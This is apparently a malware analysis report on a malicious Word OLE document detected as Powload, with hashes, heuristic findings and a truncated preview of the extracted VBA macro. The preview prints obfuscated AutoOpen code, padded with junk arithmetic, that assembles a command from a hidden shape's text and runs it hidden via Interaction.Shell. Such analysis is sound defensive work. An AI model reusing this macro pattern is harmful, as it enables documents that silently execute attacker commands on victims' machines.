Office (OLE) malware analysis — malicious · a14871d7f2f534f2

MALICIOUS

Office (OLE)

81.5 KB Created: 2018-11-21 06:42:00 Authoring application: Microsoft Office Word First seen: 2019-09-30

MD5: 86f72443d93a3e9826d4f85d3203c180 SHA-1: ecdebae2573fb9980269008bd0ef6f104a4943a0 SHA-256: a14871d7f2f534f235fdeeaf10c5176b13e23e47c6bd292eb7749fa13115ed6a

142 Risk Score

Heuristics 5

ClamAV: Doc.Malware.Powload-6769687-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.Powload-6769687-0
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4306 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	4306 bytes
SHA-256: `7fbf7dc8e951736d294b1114525f235cda0363fe91fc9409f355a76c5293eba7`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "zwPnbaPMhczl" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() On Error Resume Next If ZCiBhH Xor uInZdTbp Then OOiUMEjv = ZodiGjUMt End If If zPYVaNm Xor MawCWdXpb Then VDVTmK = Sgn(TILBE) End If QawsT = (tDHaLWVs - CDbl(150277218) / ALRIHq + Sgn(278563017)) - 47311996 + CInt(cOMHFar) - 54465941 * Fix(144760076 * Oct(bXlEziJO)) Set KwRRlBH = kvwaj On Error Resume Next If HstSVzzWv Xor fdFpFaMB Then CCNstrY = RlFwtpkw End If If foqaK Xor lqiwwYG Then ijrFo = Sgn(zAazPjkqi) End If oUqAvXLA = (hcCLvbLKk - CDbl(172382060) / BkwFFf + Sgn(89651851)) - 299177737 + CInt(dlvHwH) - 182826472 * Fix(221759001 * Oct(GHVrM)) Set RzofV = VAPQk On Error Resume Next If iMRmZbN Xor atzcIT Then AvvcAcWr = DQiqGn End If If dkHZonU Xor sDnVjnGk Then vqizb = Sgn(sLUEi) End If zXKnP = (sAtwNa - CDbl(66863167) / zpBLZzfc + Sgn(306548141)) - 106556964 + CInt(iBfPN) - 127064939 * Fix(226929804 * Oct(cvfchRTN)) Set IzdIprGD = JfldUc Set luQKRpP = Shapes("CzQrEcTFJitGM") On Error Resume Next If dzSZd Xor FhkFri Then EDtfUiZhk = QPdcjw End If If VTAuBiFSi Xor JfQMEz Then YYmMLp = Sgn(VslBKziV) End If njYiACZo = (mUPCTB - CDbl(77296529) / QDLKlK + Sgn(196953408)) - 105972894 + CInt(JsDIifo) - 303291339 * Fix(195776193 * Oct(jTNWwwz)) Set UUTZkps = fJaBYuNb On Error Resume Next If llSWJZ Xor pFpzpNS Then sREvzrSdC = BuCUSBhDN End If If BnOTrr Xor OqvVV Then SCOuBRXTH = Sgn(bIfUUn) End If PlAAqECk = (GmEmG - CDbl(166585481) / AjSDHjmp + Sgn(339966249)) - 303437501 + CInt(nLMWlaD) - 212302905 * Fix(239322504 * Oct(tczLJz)) Set kOUJCc = kCjfjzK On Error Resume Next If mZbthHKCC Xor kzhto Then tHaiDEQ = ChqOiYmXT End If If YQVJUqAiA Xor GYrXhba Then GFuiJk = Sgn(zQwTiQNdj) End If YAjmjdV = (tkiqT - CDbl(218189850) / wTQNE + Sgn(278563470)) - 45899435 + CInt(SVZEOWGt) - 308049478 * Fix(56886329 * Oct(JaqfW)) Set YdPzMJz = MfwwPi JFqoqY = "" + PYrjBdj + LGHUrzjb + luQKRpP.TextFrame.TextRange.Text + ZNljimi + zlJtfQ On Error Resume Next If NEdIzSwwd Xor wZFJQK Then izVWX = PioFXwnS End If If WjqzjTGc Xor hWFBPY Then BzJVBU = Sgn(pUOZINZ) End If qwKCZTSah = (UFoBdNT - CDbl(103084815) / VziwmBFAc + Sgn(140825602)) - 301666473 + CInt(OqjjHrMzv) - 229794781 * Fix(166257771 * Oct(wjOmoqA)) Set tXEwL = YBUTq Interaction.Shell@ JFqoqY + GPFVVWG + mZCzFnTL, vbHide On Error Resume Next If lStFNifom Xor QqnbNUMLE Then zdUnj = zKVNRFbE End If If LXSuXnZPO Xor uMwCIGpL Then zIzGW = Sgn(jVSYaLO) End If kCzuRjNY = (FzocBH - CDbl(87704401) / ctZGh + Sgn(90160385)) - 112496190 + CInt(VrRGqncfc) - 78054875 * Fix(4112617 * Oct(MYioZu)) Set HhwfOFSwR = dCofwvpw On Error Resume Next If UmJStnYH Xor blUJQ Then DoPvsLc = UkkFzO End If If CzbiuLOd Xor aGHEtd Then NMutNzka = Sgn(rSohIhY) End If VYosaVSoK = (UmDXa - CDbl(285094034) / XtFUUDNBE + Sgn(23206099)) - 297834149 + CInt(wFthOjU) - 271929979 * Fix(298057731 * Oct(qbECzPna)) Set rzjlnT = BVbqWSZ On Error Resume Next If rEFAjnRZi Xor InfwvL Then BDQiXfwBS = AqrpcK End If If fjwXAwU Xor XKzBZ Then UzuizIK = Sgn(YHzRbR) End If nXjcHTMN = (BGvjzU - CDbl(333138980) / toftzHcBN + Sgn(71406598)) - 73289363 + CInt(XiVDSknSY) - 117909647 * Fix(28044609 * Oct(kahsN)) Set UDIzYml = pPDatIAV On Error Resume Next If QzcKSBjuW Xor cZtYQwYq Then VwzAwIn = ttJiG End If If zrXwaG Xor JMhrRdJYz Then wtsI ... (truncated)

SHA-256: 7fbf7dc8e951736d294b1114525f235cda0363fe91fc9409f355a76c5293eba7

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "zwPnbaPMhczl"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   On Error Resume Next
      If ZCiBhH Xor uInZdTbp Then
         OOiUMEjv = ZodiGjUMt
      End If
      If zPYVaNm Xor MawCWdXpb Then
         VDVTmK = Sgn(TILBE)
      End If
   QawsT = (tDHaLWVs - CDbl(150277218) / ALRIHq + Sgn(278563017)) - 47311996 + CInt(cOMHFar) - 54465941 * Fix(144760076 * Oct(bXlEziJO))
Set KwRRlBH = kvwaj
   On Error Resume Next
      If HstSVzzWv Xor fdFpFaMB Then
         CCNstrY = RlFwtpkw
      End If
      If foqaK Xor lqiwwYG Then
         ijrFo = Sgn(zAazPjkqi)
      End If
   oUqAvXLA = (hcCLvbLKk - CDbl(172382060) / BkwFFf + Sgn(89651851)) - 299177737 + CInt(dlvHwH) - 182826472 * Fix(221759001 * Oct(GHVrM))
Set RzofV = VAPQk
   On Error Resume Next
      If iMRmZbN Xor atzcIT Then
         AvvcAcWr = DQiqGn
      End If
      If dkHZonU Xor sDnVjnGk Then
         vqizb = Sgn(sLUEi)
      End If
   zXKnP = (sAtwNa - CDbl(66863167) / zpBLZzfc + Sgn(306548141)) - 106556964 + CInt(iBfPN) - 127064939 * Fix(226929804 * Oct(cvfchRTN))
Set IzdIprGD = JfldUc
Set luQKRpP = Shapes("CzQrEcTFJitGM")
   On Error Resume Next
      If dzSZd Xor FhkFri Then
         EDtfUiZhk = QPdcjw
      End If
      If VTAuBiFSi Xor JfQMEz Then
         YYmMLp = Sgn(VslBKziV)
      End If
   njYiACZo = (mUPCTB - CDbl(77296529) / QDLKlK + Sgn(196953408)) - 105972894 + CInt(JsDIifo) - 303291339 * Fix(195776193 * Oct(jTNWwwz))
Set UUTZkps = fJaBYuNb
   On Error Resume Next
      If llSWJZ Xor pFpzpNS Then
         sREvzrSdC = BuCUSBhDN
      End If
      If BnOTrr Xor OqvVV Then
         SCOuBRXTH = Sgn(bIfUUn)
      End If
   PlAAqECk = (GmEmG - CDbl(166585481) / AjSDHjmp + Sgn(339966249)) - 303437501 + CInt(nLMWlaD) - 212302905 * Fix(239322504 * Oct(tczLJz))
Set kOUJCc = kCjfjzK
   On Error Resume Next
      If mZbthHKCC Xor kzhto Then
         tHaiDEQ = ChqOiYmXT
      End If
      If YQVJUqAiA Xor GYrXhba Then
         GFuiJk = Sgn(zQwTiQNdj)
      End If
   YAjmjdV = (tkiqT - CDbl(218189850) / wTQNE + Sgn(278563470)) - 45899435 + CInt(SVZEOWGt) - 308049478 * Fix(56886329 * Oct(JaqfW))
Set YdPzMJz = MfwwPi
JFqoqY = "" + PYrjBdj + LGHUrzjb + luQKRpP.TextFrame.TextRange.Text + ZNljimi + zlJtfQ
   On Error Resume Next
      If NEdIzSwwd Xor wZFJQK Then
         izVWX = PioFXwnS
      End If
      If WjqzjTGc Xor hWFBPY Then
         BzJVBU = Sgn(pUOZINZ)
      End If
   qwKCZTSah = (UFoBdNT - CDbl(103084815) / VziwmBFAc + Sgn(140825602)) - 301666473 + CInt(OqjjHrMzv) - 229794781 * Fix(166257771 * Oct(wjOmoqA))
Set tXEwL = YBUTq
Interaction.Shell@ JFqoqY + GPFVVWG + mZCzFnTL, vbHide
   On Error Resume Next
      If lStFNifom Xor QqnbNUMLE Then
         zdUnj = zKVNRFbE
      End If
      If LXSuXnZPO Xor uMwCIGpL Then
         zIzGW = Sgn(jVSYaLO)
      End If
   kCzuRjNY = (FzocBH - CDbl(87704401) / ctZGh + Sgn(90160385)) - 112496190 + CInt(VrRGqncfc) - 78054875 * Fix(4112617 * Oct(MYioZu))
Set HhwfOFSwR = dCofwvpw
   On Error Resume Next
      If UmJStnYH Xor blUJQ Then
         DoPvsLc = UkkFzO
      End If
      If CzbiuLOd Xor aGHEtd Then
         NMutNzka = Sgn(rSohIhY)
      End If
   VYosaVSoK = (UmDXa - CDbl(285094034) / XtFUUDNBE + Sgn(23206099)) - 297834149 + CInt(wFthOjU) - 271929979 * Fix(298057731 * Oct(qbECzPna))
Set rzjlnT = BVbqWSZ
   On Error Resume Next
      If rEFAjnRZi Xor InfwvL Then
         BDQiXfwBS = AqrpcK
      End If
      If fjwXAwU Xor XKzBZ Then
         UzuizIK = Sgn(YHzRbR)
      End If
   nXjcHTMN = (BGvjzU - CDbl(333138980) / toftzHcBN + Sgn(71406598)) - 73289363 + CInt(XiVDSknSY) - 117909647 * Fix(28044609 * Oct(kahsN))
Set UDIzYml = pPDatIAV
   On Error Resume Next
      If QzcKSBjuW Xor cZtYQwYq Then
         VwzAwIn = ttJiG
      End If
      If zrXwaG Xor JMhrRdJYz Then
         wtsI
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.